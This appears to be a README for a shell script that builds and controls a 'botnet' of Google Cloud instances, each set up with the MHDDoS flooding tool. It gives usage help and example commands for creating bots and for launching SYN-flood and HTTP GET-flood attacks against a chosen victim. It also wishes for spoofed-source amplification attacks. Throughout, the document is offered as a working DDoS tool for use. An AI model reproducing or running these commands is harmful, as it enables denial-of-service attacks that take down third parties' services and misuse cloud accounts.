This is a script that aids in managing a botnet in the Google Cloud Platform. It allows to manipulate botnets of variable sizes, and do such things as create/destroy botnet, or run some command on all or part of a botnet.
Currently you can treat it as a kind of a wrapper around gcloud
and MHDDoS
scripts, because it's implemented in this usage in mind, but you can easily tune it to your personal needs.
Here's its usage help, pretty self-explanatory:
Usage: ./botcc.sh [options...]
-a, --all Run action on each bot in the botnet.
-n, --num <num> Run action on num random bots.
-b, --bot <botname> Run action on specified bot.
-B, --botnet <botnet> Specify botnet to act on.
-d, --delete Delete specified bots.
-c, --create Create some bots.
-r, -C, --command <cmd> Command to run on each bot.
--attack <Layer:attack> Run this MHDDoS attack on bots
--victim <victim_spec> Victim specification, like in MHDDoS
-l, --list List bots in selected botnet.
--async Launch things asynchronously.
-t,--no-tty Don't allocate pty device
-u, --user <user> Run command on bot under the user.
-S, --ssh-key-file <file> Connect to bot with this ssh key file.
-z, --zone <zone> (With -c only) Create bots in this zone
-Z, --zone-file <file> (With -c only) Create bots in zones, specified in the file.
-v, --verbose Make output more verbose.
-q, --quiet Be more quiet.
WARNING: Currently, user needs to setup google api
, so that gcloud
command is authorized to do things on user's account, in other words gcloud
is usable and doesn't need no more configuration. See Google API docs.
Example:
./botcc.sh -c -n 10 -B test --async -v -z europe-west4-c
This command will create a botnet of size 10 bots in the botnet named test, located in the google zone europe-west4-c, verbosely and asynchronously. -z
or -Z
flags are optional, and allows users to create bots in specific geographical zones.
Hint: Use --async
flag, because it really speeds up things, and the time needed to create a botnet, for example, decreases drastically. But be aware that remote commands won't produce any output to the screen, because underlying ssh
process exits immediately after starting a process on the remote end. It's a type of compromise, since otherwise in an alternative implementation, a lot of ssh
processes will hang on the C&C host, waiting in the background and consuming lots of the system's resources. Redirect command's stdout
to a file in order to capture it.
This is how this command works internally:
- Create a bot.
- Copy bot init script(
bot_init.sh
by default) to the bot. - Run that script.
Bot initialization script is highly my personal taste, but long story short, it will install MHDDoS script on a bot.
./botcc.sh --list --quiet --all --botnet test
This command will list all of the bots owned by botnet test. Without --quiet
flag it will also show associated with each bot google zone, in which it was created.
User can also specify -n
option instead of --all
, to just show n random bots, for whatever reason.
It's how a user would remove the whole botnet named test.
./botcc.sh -d -a -B test --async
Note that -n
option can be specified instead of -a
to remove n random bots.
To run an attack, one would need to specify both --attack
and --victim
options.
The --attack
option's format is "LAYER:ATTACK", where layer specifies OSI layer of the attack, and ATTACK specifies the name of an attack, as listed in the MHDDoS documentation.
Example 1: syn flood attack using 5 random bots from the botnet test
./botcc.sh -n 5 -B test --attack L4:syn --victim 127.0.0.1:80 --async -v
Example 2: get flood attack, using all bots of the botnet test
./botcc.sh -a -B test --attack L7:get --victim http:https://127.0.0.1:80/index.html --async -v
No proxies will be used. If something doesn't suit user's needs, he can change underlying run command, or add another handler for LAYER, as an example.
That's how you would print load average of each of the bots
./botcc.sh -a -r 'printf "hello from host $(hostname). Here is my uptime: $(uptime)\n"' -B test
As with previous options, -n
or -a
option can be used to select on which bots of a botnet to run the command.
- Add something like an
--init
option, that will do all of the neccessary preparations of the google cloud api in a semi-automatic way and guide a user through the installation, so that user no longer needs to preconfigure his environment and read google docs before running this script. So much tasty feature that's still lacking :( - Add support for more cloud hosting providers. Can be useful, since google is dropping packets with spoofed source
IP
address, which is a crucial property restricting from usage of most of the amplification ddos attacks.